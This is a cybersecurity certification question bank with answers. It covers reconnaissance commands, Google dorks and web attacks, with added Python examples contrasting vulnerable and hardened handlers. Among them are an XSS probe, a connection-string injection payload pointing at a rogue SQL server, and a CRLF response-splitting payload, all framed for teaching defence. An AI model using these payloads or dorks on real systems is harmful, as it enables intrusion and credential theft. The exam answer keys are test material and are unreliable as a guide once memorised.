Which of the following techniques is used by network management software to detect rogue APs? - AP scanning - Wired side inputs - RF scanning - Virtual-private network
Wired side inputs
Which of the following components of Cisco's WIPS deployment forwards attack information from wireless IPS monitor-mode APs to the MSE and distributes configuration parameters to APs? - Wireless control system - Mobility services engine - Local mode AP - Wireless LAN controller
Wireless LAN controller
In which of the following attacks does an attacker exploit dynamic routing protocols, such as DSR and AODV, and place themselves strategically in a target network to sniff and record ongoing wireless transmissions? - Sinkhole attack - Wormhole attack - RADIUS replay - Honeypot AP attack
Wormhole attack
Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this? - aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 - airmon-ng start wifi0 9 - aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0 - airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Which of the following options of Sublist3r allows the user to specify a comma-separated list of search engines? - d - p - e - o
e
Which of the following hping3 commands is used to perform an ACK scan? - hping3 -1 <IP Address> -p 80 - hping3 -8 50-60 -S <IP Address> -V - hping3 -A <IP Address> -p 80 - hping3 -2 <IP Address> -p 80
hping3 -A <IP Address> -p 80
Which of the following hping commands is used by an attacker to collect the initial sequence number? - hping3 192.168.1.103 -Q -p 139 -s - hping3 -A 10.0.0.25 -p 80 - hping3 -S 72.14.207.99 -p 80 --tcp-timestamp - hping3 -2 10.0.0.25 -p 80
hping3 192.168.1.103 -Q -p 139 -s
Robin, a professional hacker, targeted an organization for financial benefit. He initiated footprinting attacks on the target organization. In this process, he used an advanced Google search query that returns a list of FTP servers by IP address, which are mostly Windows NT servers with guest login capabilities. What is the advanced Google search query employed by Robin in the above scenario? - inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html' - intitle:"Index Of" - intext:sftp-config.jsonintext:pure-ftpd.conf intitle:index of - type:mil inurl:ftp ext:pdf | ps
inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'
Which of the following web services provides useful information about a target company, such as the market value of the company's shares, company profile, and competitor details? - investing.com - linkup.com - dice.com - indeed.com
investing.com
Which of the following commands displays various options that a user can utilize to obtain a list of words from a target website? - dnsrecon -r 162.241.216.0-162.241.216.255 - cewl --email www.certifiedhacker.com - ruby cewl.rb --help - cewl www.certifiedhacker.com
ruby cewl.rb --help
Which of the following Nmap options is used by an attacker to perform an SCTP COOKIE ECHO scan? - sZ - sU - sL - sY
sZ
Which of the following tools does an attacker use to perform a query on the platforms included in OSRFramework? - domainfy.py - searchfy.py - mailfy.py - usufy.py
searchfy.py
Which Google search query will search for any files a target certifiedhacker.com may have? - site: certifiedhacker.com filetype:xml | filetype:conf | filetype:cnf | filetype:reg | filetype:inf | filetype:rdp | filetype:cfg | filetype:txt | filetype:ora | filetype:ini - allinurl: certifiedhacker.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini - site: certifiedhacker.com ext:xml || ext:conf || ext:cnf || ext:reg || ext:inf || ext:rdp || ext:cfg || ext:txt || ext:ora || ext:ini - site: certifiedhacker.com intext:xml | intext:conf | intext:cnf | intext:reg | intext:inf | intext:rdp | intext:cfg | intext:txt | intext:ora | intext:ini
site: certifiedhacker.com filetype:xml | filetype:conf | filetype:cnf | filetype:reg | filetype:inf | filetype:rdp | filetype:cfg | filetype:txt | filetype:ora | filetype:ini
Which Google search query can you use to find mail lists dumped on pastebin.com? - site:pastebin.com intext:*@*.com:* - allinurl: pastebin.com intitle:*@*.com:* - allinurl: pastebin.com intitle:"mail lists" - cache: pastebin.com intitle:*@*.com:*
site:pastebin.com intext:*@*.com:*
A hacker is attempting to check for all the systems alive in the network by performing a ping sweep. Which NMAP switch would the hacker use? - sU - sS - sn - sT
sn
Which of the following system tables does the MS SQL Server database use to store metadata? Hackers can use this system table to acquire database schema information to further compromise the database. - syscell - sysobjects - sysrow - sysdbs
sysobjects
Which of the following is a security risk due to the incorrect implementation of applications, allowing attackers to compromise passwords, keys, session tokens, and exploit user identity? - Security misconfiguration - Sensitive data exposure - Broken authentication - Injection
Broken authentication
In which of the following attack types does an attacker flood an application with an excess amount of data so that the application may crash or exhibit vulnerable behavior? - Directory traversal - Denial-of-service attack - Buffer overflow attack - Parameter/form tampering
Buffer overflow attack
Which of the following techniques is NOT a countermeasure for securing accounts? - Enable unused default user accounts - Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms - Eliminate unnecessary database users and stored procedures - Remove all unused modules and application extensions
Enable unused default user accounts
Which of the following techniques is NOT a countermeasure for securing accounts? - Remove all unused modules and application extensions - Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms - Enable unused default user accounts - Eliminate unnecessary database users and stored procedures
Enable unused default user accounts
Which of the following is not a defensive measure for web server attacks while implementing Machine.config? - Limit inbound traffic to port 80 for HTTP and port 443 for HTTPS (SSL) - Ensure that tracing is enabled <trace enable="true"/> and debug compiles are turned on - Encrypt or restrict intranet traffic - Restrict code access security policy settings
Ensure that tracing is enabled <trace enable="true"/> and debug compiles are turned on
Which of the following tools is not used to perform webserver information gathering? - Nmap - Netcraft - Wireshark - Whois
Wireshark
Which of the following is an operation in the web service architecture that involves obtaining the service interface description at the time of development as well as the binding and location description calls at run time? - Find - Bind - Publish - Service
Find
Which of the following techniques makes a web server vulnerable to attacks? - Blocking unrestricted internal and outbound traffic - Running unhardened applications and servers - Regularly updating the web server with the latest patches - Using different system administrator credentials everywhere
Running unhardened applications and servers
Which of the following stores a server's configuration, error, executable, and log files? - Document root - Virtual document tree - Server root - Web proxy
Server root
Which of the following terms refers to a set of hotfixes packed together? - Service pack - Repair pack - Hotfix pack - Patch
Service pack
Which of the following commands does an attacker use to enumerate common web applications? - nmap -p80 --script http-userdir-enum localhost - nmap --script http-trace -p80 localhost - nmap --script http-enum -p80 <host> - nmap -p80 --script http-trace <host>
nmap --script http-enum -p80 <host>
An attacker identifies the kind of websites a target company/individual frequently visits and tests those particular websites to identify any possible vulnerabilities. When the attacker identifies the vulnerabilities in the website, the attacker injects malicious script/code into the web application that can redirect the webpage and download the malware onto the victim's machine. After infecting the vulnerable web application, the attacker waits for the victim to access the infected web application. What kind of attack is this? - Phishing attack - Jamming attack - Water hole attack - Denial-of-service attack
Water hole attack
The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services? - A security certification for hardened web applications - Web application patches - A list of flaws and how to fix them - An extensible security framework named COBIT
A list of flaws and how to fix them
In which of the following attack techniques does an attacker lure victims via email or a link that is constructed such that the loopholes of remote execution code become accessible, allowing the attacker to obtain access privileges equal to those of authorized users? - ActiveX attack - Session fixation - Frame injection - Request forgery attack
ActiveX attack
Which of the following is NOT a best approach to protect your firm against web server attacks? - Apply restricted ACLs - Allow remote registry administration - Remove unnecessary ISAPI filters from the web server - Secure the SAM (Stand-alone Servers Only)
Allow remote registry administration
Which of the following is NOT a best approach to protect your firm against web server attacks? - Remove unnecessary ISAPI filters from the web server - Allow remote registry administration - Apply restricted ACLs - Secure the SAM (Stand-alone Servers Only)
Allow remote registry administration
Which of the following is a web security testing tool that can be used by an attacker to predict and use the next possible session ID token to take over a valid session? - Burp Suite - Nikto2 - NCollector Studio - Netcraft
Burp Suite
An attacker has been successfully modifying the purchase price of items purchased on the company's website. The security administrators verify the webserver and Oracle database have not been compromised directly. They have also verified the intrusion detection system (IDS) logs and found no attacks that could have caused this. What is the most likely way the attacker has been able to modify the purchase price? - By changing hidden form values - By using SQL injection - By using cross site scripting - By utilizing a buffer overflow attack
By changing hidden form values
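Why the hidden field is the likely culprit and how a server avoids it, as an added example that is not from the original question set: a checkout that reads the price from a hidden input lets the client set the price; the hardened handler prices by SKU from its own catalogue and validates the quantity for type, length and range (the data-validation rule from the earlier question). The catalogue, form bodies and function names below are constructed for the example.

```python
from decimal import Decimal
from urllib.parse import parse_qs

# Constructed catalogue: the only price the server should ever trust.
CATALOG = {"sku-100": Decimal("49.99"), "sku-200": Decimal("199.00")}
MAX_QTY = 99


def _field(form: dict, name: str) -> str:
    """Exactly one value for the field, or reject (repeated fields are a tampering tell)."""
    values = form.get(name)
    if not values or len(values) != 1:
        raise ValueError("missing or repeated field: " + name)
    return values[0]


def order_total_trusting_form(body: str) -> Decimal:
    """Vulnerable: the hidden 'price' input is taken at face value."""
    form = parse_qs(body)
    return Decimal(_field(form, "price")) * int(_field(form, "qty"))


def order_total_server_priced(body: str) -> tuple:
    """Hardened: price comes from the catalogue keyed by SKU; qty is checked for
    type (digits only), length (at most 2 chars) and range (1..MAX_QTY).
    Returns (total, tampered) so a client-supplied price that disagrees with
    the catalogue can be logged; it is never used for pricing."""
    form = parse_qs(body, max_num_fields=10)
    sku = _field(form, "sku")
    if len(sku) > 32 or sku not in CATALOG:
        raise ValueError("unknown sku")
    qty_raw = _field(form, "qty")
    if not qty_raw.isdigit() or len(qty_raw) > 2:
        raise ValueError("qty must be a small positive integer")
    qty = int(qty_raw)
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("qty out of range")
    tampered = False
    if "price" in form:
        try:
            tampered = Decimal(_field(form, "price")) != CATALOG[sku]
        except ArithmeticError:      # decimal.InvalidOperation on junk input
            tampered = True
    return CATALOG[sku] * qty, tampered


def rejects(body: str) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        order_total_server_priced(body)
    except ValueError:
        return True
    return False


# Constructed request bodies: the second one is the attacker's edited form.
HONEST_BODY = "sku=sku-200&qty=1&price=199.00"
TAMPERED_BODY = "sku=sku-200&qty=1&price=0.01"

if __name__ == "__main__":
    print("trusting form :", order_total_trusting_form(TAMPERED_BODY))
    print("server priced :", order_total_server_priced(TAMPERED_BODY))
```

Nothing in this attack touches the database or trips a signature-based IDS: the request is well-formed, the only oddity is a value the server should never have accepted. Logging the tampered flag is what turns it into a detectable event.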
Which of the following tools is employed by a pen tester to find vulnerabilities in an organization's web server and evaluate its security posture by using the same techniques as those currently employed by cybercriminals? - Pupy - Netcraft - CORE Impact - NetVizor
CORE Impact
In which of the following cookie exploitation attacks does an attacker modify the cookie contents to obtain unauthorized information about a user and thereby perform identity theft? - Cookie sniffing - Cookie replay - Session brute-forcing - Cookie poisoning
Cookie poisoning
Which of the following is a clickjacking technique that overlays only the selected controls from a transparent page and involves masking buttons with hyperlinks and text labels containing false information? - Complete transparent overlay - Rapid content replacement - Cropping - Click event dropping
Cropping
In which of the following attack types does an attacker exploit the trust of an authenticated user to pass malicious code or commands to a web server? - SQL injection attack - Unvalidated input and file injection - Cross-site scripting - Cross-site request forgery
Cross-site request forgery
Which of the following is a web application attack that is also known as a one-click attack and occurs when a hacker instructs a user's web browser to send a request to a vulnerable website through a malicious web page? - Cross-site request forgery - Web service attack - Hidden field manipulation - Cookie snooping
Cross-site request forgery
A security analyst in an insurance company is assigned to test a new web application that clients will use to choose and apply for an insurance plan. The analyst discovers that the application is developed in ASP and uses MSSQL as the database backend. The analyst locates the application's search form and enters the following code in the search input field: <IMG SRC=vbscript:msgbox("Vulnerable")> When the analyst submits the form, the browser returns a pop-up window that says "Vulnerable". Which web application vulnerability did the analyst discover? - Cross-site request forgery - Command injection - Cross-site scripting - SQL injection
Cross-site scripting
Which of the following attacks exploits vulnerabilities in dynamically generated webpages, which enables malicious attackers to inject client-side scripts into webpages viewed by other users? - Cross-site scripting - Broken access control - Security misconfiguration - Sensitive data exposure
Cross-site scripting
Which of the following is an application security threat that occurs when an application includes untrusted data in a new web page without proper validation or escaping or when an application updates an existing web page with user-supplied data? - Security misconfiguration - Components with known vulnerabilities - Cross-site scripting (XSS) - XML external entity (XXE)
Cross-site scripting (XSS)
Which of the following is not a session hijacking technique? - Cross-site scripting - DNS hijacking - Session fixation - Session sidejacking
DNS hijacking
Choose an ICANN accredited registrar and encourage them to set registrar-lock on the domain name in order to avoid which attack? - Man-in-the-middle attack - Denial-of-service attack - Session hijacking attack - DNS hijacking attack
DNS hijacking attack
If an attacker compromises a DNS server and changes the DNS settings so that all the requests coming to the target webserver are redirected to his/her own malicious server, then which attack did he perform? - DNS amplification attack - HTTP response splitting attack - DoS attack - DNS server hijacking
DNS server hijacking
Which of the following is a type of attack in which the attacker alters or deletes the data of a web server and replaces the data with malware? - Data theft - Compromise of user accounts - Data tampering - Website defacement
Data tampering
Which of the following types of damage is caused when attackers access sensitive data such as financial records, future plans, and the source code of a program? - Website defacement - Data theft - Damage of the reputation of the company - Data tampering
Data theft
The security analyst for Danels Company arrives at his office this morning and checks the company's primary home page. He notices that the page shows a competitor's logo and text that does not belong to the real page. What kind of attack do the observed signs correspond to? - DDoS - Defacement - Phishing - HTTP attack
Defacement
An attacker sends numerous fake requests to the webserver from various random systems that results in the webserver crashing or becoming unavailable to the legitimate users. Which attack did the attacker perform? - HTTP response splitting attack - DNS server hijacking - DoS attack - DNS amplification attack
DoS attack
Which of the following is the root file directory of a web server that stores critical HTML files related to web pages of a domain name that will be sent in response to requests? - Virtual hosting - Document root - Web proxy - Server root
Document root
Which of the following is NOT a best approach to protect your firm against web server files and directories? - Enable serving of directory listings - Avoid mapping virtual directories between two different servers, or over a network - Eliminate unnecessary files within the .jar files - Disable serving certain file types by creating a resource mapping
Enable serving of directory listings
Which of the following techniques allows an attacker to inject unusual characters into HTML code to bypass client-side controls? - Source-code review - Attack hidden form fields - Evade XSS filters - Attack browser extensions
Evade XSS filters
A security administrator is looking for a patch management tool which scans organizational network and manages security and non-security patches. Which of the following patch management tool, he/she can use in order to perform the required task? - Netscan Pro - Nikto - Burp suite - GFI LanGuard
GFI LanGuard
In which of the following types of injection attacks does an attacker exploit vulnerable form inputs, inject HTML code into a webpage, and change the website appearance? - Shell injection - File injection - HTML injection - HTML embedding
HTML injection
Which of the following tools is used by an attacker to perform website mirroring? - HTTrack - Hydra - Netcraft - Nessus
HTTrack
Which of the following techniques does an attacker use to replace the value of the data source parameter with that of a rogue Microsoft SQL server? - Hash stealing - Connection pool DoS - Port scanning - Hijacking web credentials
Hash stealing
One of the following is a clickjacking technique in which an attacker creates an iframe of 1 × 1 pixels containing malicious content placed secretly under the mouse cursor. When the user clicks on this cursor, it will be registered on a malicious page. Which is this clickjacking technique? - Click event dropping - Hidden overlay - Complete transparent overlay - Rapid content replacement
Hidden overlay
An attacker wants to crack passwords using attack techniques like brute-forcing, dictionary attack, and password guessing attack. What tool should he use to achieve his objective? - Netcraft - Nessus - Burp suite - Hydra
Hydra
Which of the following tools is a simple Internet server identification utility that is capable of performing reverse DNS lookup and HTTP server identification? - OllyDbg - ID Serve - Dylib Hijack Scanner - NCollector Studio
ID Serve
Which of the following countermeasures should be followed to defend against DNS hijacking? - Include DNS hijacking into incident response and business continuity planning - Do not safeguard the registrant account information - Use the default router password included in the factory settings - Download audio and video codecs and other downloaders from untrusted websites
Include DNS hijacking into incident response and business continuity planning
What technique is used to perform a connection stream parameter pollution (CSPP) attack? - Injecting parameters into a connection string using semicolons as a separator - Adding multiple parameters with the same name in HTTP requests - Setting a user's session identifier (SID) to an explicit known value - Inserting malicious Javascript code into input parameters
Injecting parameters into a connection string using semicolons as a separator
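The mechanics of CSPP and of the "hash stealing" variant from the earlier question, as an added example that is not from the original question set: when an application concatenates a user-supplied credential into a connection string, a value containing semicolons appends extra keyword=value pairs, and because providers take the last occurrence of a repeated keyword, Data Source can be redirected to a rogue SQL Server while Integrated Security=SSPI makes the application authenticate there with its Windows credentials. The parser below is a deliberately minimal model of that last-occurrence rule (assumption: no quoting support, unlike a real provider), and the payload, server names and function names are constructed for the example.

```python
def parse_connection_string(cs: str) -> dict:
    """Minimal model of 'key=value;key=value' parsing: keys are case-insensitive
    and a repeated key is overwritten by its last occurrence. Quoting rules of
    real providers are deliberately omitted (stated assumption)."""
    params = {}
    for part in cs.split(";"):
        if not part.strip():
            continue
        key, sep, value = part.partition("=")
        if not sep:
            raise ValueError("malformed segment: %r" % part)
        params[key.strip().lower()] = value.strip()
    return params


def build_vulnerable(user: str, password: str) -> str:
    """Concatenates credentials straight into the connection string."""
    return ("Data Source=db.internal;Initial Catalog=shop;"
            "User ID=%s;Password=%s;" % (user, password))


_META = set(";='\"")


def build_safe(user: str, password: str) -> str:
    """Rejects connection-string metacharacters in user-controlled values, then
    builds the same string. In production prefer the provider's builder class,
    which quotes values instead of concatenating them."""
    for name, value in (("user", user), ("password", password)):
        if _META & set(value):
            raise ValueError(name + " contains connection-string metacharacters")
    return build_vulnerable(user, password)


def effective_target(cs: str) -> tuple:
    """(server the application will actually connect to, whether it will use
    Windows integrated authentication there)."""
    p = parse_connection_string(cs)
    integrated = p.get("integrated security", "").lower() in ("sspi", "true", "yes")
    return p.get("data source", ""), integrated


def safe_rejects(user: str, password: str) -> bool:
    try:
        build_safe(user, password)
    except ValueError:
        return True
    return False


# Constructed payload submitted as the 'password' field: the leading 'x;'
# closes the Password keyword, the rest re-points the connection.
PAYLOAD = "x;Data Source=10.10.10.99,1433;Integrated Security=SSPI"

if __name__ == "__main__":
    print(effective_target(build_vulnerable("alice", PAYLOAD)))
    print(effective_target(build_safe("alice", "s3cret")))
```

The port-scanning and connection-pool DoS variants from the same family use the same injection point with different keywords (a Data Source pointing at each internal host and port, or a tiny Max Pool Size).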
Which of the following techniques is NOT a countermeasure to defend against web server attacks? - Use a dedicated machine as a web server - Secure the SAM - Install IIS server on a domain controller - Relocate sites and virtual directories to non-system partitions
Install IIS server on a domain controller
Which of the following security misconfigurations supports weak algorithms and uses expired or invalid certificates, resulting in data exposure and account theft? - Improper error handling - Parameter/form tampering - Unvalidated inputs - Insufficient transport layer protection
Insufficient transport layer protection
In which layer of the web-application vulnerability stack does an attacker scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them? - Layer 3 - Layer 2 - Layer 5 - Layer 7
Layer 3
In which layer of the web application vulnerability stack does an attacker exploit business-logic flaws and technical vulnerabilities to perform input validation attacks such as XSS? - Layer 4 - Layer 5 - Layer 7 - Layer 6
Layer 7
Which of the following vulnerabilities occurs when an application adds files without the proper validation of inputs, thereby enabling an attacker to modify the input and embed path traversal characters? - Security misconfiguration - File fingerprinting - Local file inclusion - Fileless malware
Local file inclusion
In which of the following attacks does an attacker attempt to access sensitive information by intercepting and altering communications between an end user and a web server? - Man-in-the-middle attack - HTTP response splitting attack - Phishing attack - Website defacement attack
Man-in-the-middle attack
Which of the following attacks allows an attacker to access sensitive information by intercepting and altering communications between an end user and webservers? - Man-in-the-middle attack - HTTP response splitting attack - Directory traversal attack - DoS attack
Man-in-the-middle attack
Which of the following is not a webserver security tool? - Fortify WebInspect - NetIQ Secure Configuration Manager - Netcraft - Retina CS
Netcraft
Which of the following is an attack that can majorly affect web applications, including the basic level of service, and allows a level of privilege that standard HTTP application methods cannot grant? - Platform exploits - CAPTCHA attacks - Buffer overflow - Network access attacks
Network access attacks
Which of the following is a lookup database for default passwords, credentials, and ports? - Netcraft - NCollector Studio - Open Sez Me - ID Serve
Open Sez Me
Which of the following guidelines should be followed by application developers to defend against HTTP response-splitting attacks? - Use the same TCP connection with the proxy for different virtual hosts - Allow CR (%0d or \r) and LF (%0a or \n) characters - Parse all user inputs or other forms of encoding before using them in HTTP headers - Share incoming TCP connections among different clients
Parse all user inputs or other forms of encoding before using them in HTTP headers
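What "parse all user inputs or other forms of encoding before using them in HTTP headers" means in practice, as an added example that is not from the original question set: a redirect handler that decodes a parameter and drops it into the Location header lets %0d%0a terminate the header block, so one request produces two responses and the second one, attacker-authored, can be cached or rendered. The check must run on the decoded value, after URL decoding. The handlers, payload and counting helper below are constructed for the example.

```python
from urllib.parse import unquote

CRLF = "\r\n"


def redirect_vulnerable(target_param: str) -> str:
    """Decodes the query parameter and concatenates it into the Location header."""
    target = unquote(target_param)
    return ("HTTP/1.1 302 Found" + CRLF
            + "Location: " + target + CRLF
            + "Content-Length: 0" + CRLF + CRLF)


def redirect_safe(target_param: str) -> str:
    """Decodes first, then rejects anything that can end a header line."""
    target = unquote(target_param)
    if any(ch in target for ch in "\r\n\0"):
        raise ValueError("control character in header value")
    return ("HTTP/1.1 302 Found" + CRLF
            + "Location: " + target + CRLF
            + "Content-Length: 0" + CRLF + CRLF)


def count_responses(raw: str) -> int:
    """How many HTTP responses a proxy or browser would parse out of this stream."""
    return sum(1 for block in raw.split(CRLF + CRLF) if block.startswith("HTTP/1."))


def safe_rejects(target_param: str) -> bool:
    try:
        redirect_safe(target_param)
    except ValueError:
        return True
    return False


# Constructed payload as it arrives URL-encoded in ?target=...: it closes the
# 302, then supplies a complete second response with an attacker-chosen body.
PAYLOAD = ("http://shop.example/%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%2026%0d%0a%0d%0a%3Chtml%3Epoisoned%20page%3C/html%3E")

if __name__ == "__main__":
    print("vulnerable handler emits", count_responses(redirect_vulnerable(PAYLOAD)), "responses")
    print("safe handler rejects payload:", safe_rejects(PAYLOAD))
```

Modern frameworks already refuse CR/LF in header values, so the bug mostly survives in hand-rolled CGI code and in servers that decode input twice; the defensive rule is the same either way.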
Andrew, a software developer at the CyberTech organization, has released a security update that acts as a defensive technique against the vulnerabilities in a software product the company released earlier. Identify the technique used by Andrew to resolve the software vulnerabilities. - Patch Management - Product Management - Risk Management - Vulnerability Management
Patch Management
Which of the following teams has the responsibility to check for updates and patches regularly? - Vulnerability assessment team - Red team - Patch management team - Security software development team
Patch management team
Attackers use GET and CONNECT requests to use vulnerable web servers as which of the following? - Application servers - DNS servers - None of the above - Proxies
Proxies
An attacker exploits a web application by tampering with the form and parameter of the web application and he is successful in exploiting the web application and gaining access. Which type of vulnerability did the attacker exploit? - Security misconfiguration - SQL injection - Sensitive data exposure - Broken access control
Security misconfiguration
Which of the following attacks allows an attacker to inject malicious content, modify the user´s online experience, and obtain unauthorized information? - Session prediction - Session poisoning - Cross-site request forgery - Session brute-forcing
Session poisoning
Which of the following types of payload modules in the Metasploit framework is self-contained and completely stand-alone? - Stages - Exploit - Singles - Stagers
Singles
During a penetration test, a tester finds that the web application being analyzed is vulnerable to XSS. Which of the following conditions must be met to exploit this vulnerability? - The web application does not have the secure flag set. - The victim's browser must have ActiveX technology enabled. - The victim user should not have an endpoint security solution. - The session cookies do not have the HttpOnly flag set.
The session cookies do not have the HttpOnly flag set.
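A check a tester actually runs on the Set-Cookie header, as an added example that is not from the original question set: the exam answer is about stealing the session cookie through document.cookie, which HttpOnly blocks, but a practitioner audits Secure and SameSite in the same pass, since a cookie sent over plain HTTP can be sidejacked and one sent on cross-site requests enables CSRF. The parser and the two sample headers below are constructed for the example. One caveat the question glosses over: HttpOnly stops cookie theft, not XSS itself; injected script can still issue requests that ride the victim's session.

```python
def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header value into name, value and attributes.
    Attribute names are case-insensitive; bare flags (HttpOnly, Secure) map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        if not p:
            continue
        k, sep, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if sep else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_session_cookie(header: str) -> list:
    """Return the findings to report for a session cookie (empty list = clean)."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if attrs.get("httponly") is not True:
        findings.append("missing HttpOnly: readable via document.cookie by injected script")
    if attrs.get("secure") is not True:
        findings.append("missing Secure: also sent over plain HTTP (session sidejacking)")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF)")
    return findings


# Constructed headers: the first is what the question describes.
WEAK = "sid=8f2a1c; Path=/"
HARDENED = "sid=8f2a1c; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    for h in (WEAK, HARDENED):
        print(h)
        for f in audit_session_cookie(h) or ["no findings"]:
            print("  -", f)
```

Run it against every Set-Cookie in the login response, not just the first; frameworks often set a CSRF or remember-me cookie alongside the session cookie with different attributes.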
Which of the following techniques defends servers against blind response forgery? - UDP source port randomization - Disallow carriage return (%0d or \r) and line feed (%0a or \n) characters - Removal of carriage returns (CRs) and linefeeds (LFs) - Restriction of web application access to unique IPs
UDP source port randomization
Which of the following techniques defends servers against blind response forgery? - UDP source port randomization - Removal of carriage returns (CRs) and linefeeds (LFs) - Disallow carriage return (%0d or \r) and line feed (%0a or \n) characters - Restriction of web application access to unique IPs
UDP source port randomization
A network administrator has observed that the computers in his network run the Windows 7 operating system. The administrator has learned that the WannaCry ransomware is affecting Windows 7 systems across the globe. Which of the following is the best option the network administrator has to provide efficient security and defend his network? - Remove all Windows 7 machines from the network - Update security patches and fixes provided by Microsoft - Conduct vulnerability assessment of all the machines in the network - Perform penetration testing on all the machines in the network
Update security patches and fixes provided by Microsoft
Which of the following techniques is used by an attacker to enumerate usernames from a target web application? - Verbose failure message - Dictionary attack - Cookie poisoning - Bypass SAML-based SSO
Verbose failure message
Identify the component of the web server that provides storage on a different machine or disk after the original disk is filled up. - Virtual document tree - Server root - Virtual hosting - Document root
Virtual document tree
Which of the following is a web-server component that provides storage on a different machine or disk after the original disk is filled up? - Document root - Server root - Virtual hosting - Virtual document tree
Virtual document tree
Which of the following provides storage on a different machine or disk after the original disk is filled up? - Virtual Hosting - Document root - Virtual document tree - Server root
Virtual document tree
Which of the following components of the web service architecture is an extension of SOAP and can be used to maintain the integrity and confidentiality of SOAP messages? - WS-Security - WS-Policy - WSDL - UDDI
WS-Security
Which of the following provides an interface between end-users and webservers? - Firewall - Database - Demilitarized zone - Web applications
Web applications
Which of the following layers in the web application architecture contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component? - Web-server logic layer - Business logic layer - Client or presentation layer - Database layer
Web-server logic layer
In which of the following attack types does an attacker alter the visual appearance of a web page by injecting code to add image popups or text? - Web cache poisoning - Server-side request forgery - Website defacement - Web-server misconfiguration
Website defacement
Which of the following attacks occurs when an intruder maliciously alters the visual appearance of a webpage by inserting or substituting provocative, and frequently, offending data? - Directory traversal attack - Website defacement - Man-in-the-middle attack - HTTP response splitting attack
Website defacement
Which technology do SOAP services use to format information? - XML - SATA - PCI - ISDN
XML
Which of the following commands does an attacker use to detect HTTP TRACE? - nmap -p80 --script http-userdir-enum localhost - nmap --script http-enum -p80 <host> - nmap --script hostmap <host> - nmap -p80 --script http-trace <host>
nmap -p80 --script http-trace <host>